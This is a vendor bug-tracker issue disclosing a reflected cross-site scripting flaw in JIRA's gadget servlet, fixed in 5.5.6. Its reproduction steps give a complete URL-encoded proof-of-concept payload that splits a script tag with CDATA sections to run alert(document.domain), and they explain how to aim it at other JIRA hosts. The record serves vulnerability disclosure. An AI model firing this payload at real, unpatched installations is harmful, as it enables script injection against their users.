Loading...

XML

Word

Printable

Type: Bug
Resolution: Fixed
Priority: High
Fix Version/s: 5.5.6, 5.5-OD-31
Affects Version/s: 5.5.3
Component/s: Macros - Gadgets
Labels:

CVSS Score:
7.5

Steps to recreate:

1. To view the reflected XSS affecting JIRA, present on the current JIRA installation (jira.atlassian.com) visit the following link:

https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

2. To perform the reflected XSS attack on any JIRA installation (not sure how far this issue dates back to), replace the host (jira.atlassian.com, found on later in the URL) with the one you wish to test on, and append the path to the base JIRA directory.

/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

Note: This XSS requires no user interaction, or authentication.

The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.

is cloned from

JRACLOUD-66366 Reflected XSS affecting JIRA via Gadgets

Closed

Assignee:: Kenny MacLeod
Reporter:: Steve Haffenden (Inactive)
Votes:: 0 Vote for this issue
Watchers:: 3 Start watching this issue

Created:: 14/Jul/2014 3:28 AM
Updated:: 11/Oct/2018 8:37 AM
Resolved:: 18/Jul/2014 4:11 AM

Details

Description

Attachments

Issue Links

Activity

People

Dates